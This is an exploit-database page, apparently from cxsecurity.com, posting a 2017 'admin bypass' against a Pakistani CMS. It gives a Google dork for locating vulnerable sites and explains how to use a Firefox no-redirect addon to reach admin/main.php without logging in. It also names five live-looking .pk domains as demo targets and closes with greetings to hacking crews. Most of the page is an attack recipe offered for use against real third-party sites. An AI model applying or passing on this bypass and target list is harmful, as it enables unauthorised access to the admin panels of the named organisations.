Pakistan CMS Admin bypass

Published
Credit
Risk
2017.02.16
r00t d3str0y3r
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:pk/products.php?maid=

# Exploit Title: Admin bypass .pk
# Date: 2017-02-15
# Exploit Author: r00t d3str0y3r
# Discovered by : r00t d3str0y3r
# Google Dork : inurl:pk/products.php?maid=
# Tested on: WIN
Use NoRedirect By Firefox
================

addon in Mozilla Firefox
================

# link : https://addons.mozilla.org/en-US/firefox/addon/noredirect/
---------------------------------------------------------------------------------
# site admin : site.com/admin/ to admin/main.php or home.php
----------------------------------------------------------------------------------
# Demo:
diamondss.com.pk
navelsurgical.pk
aimscorp.com.pk
tucson.com.pk
highpoint.com.pk



# Greetz : Lulzsec India |Mr. Po Panda | Hexking | Drag00n | Gabber Hexor | R3D#@X0R_2H1N | MR.BL@CK_H3X | 4niL_Spyd3r | r00t d3str0y3r | GD Attacker | Spider Mate| All indian Hackers |

References:

https://fb.com/rootdestroyer


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com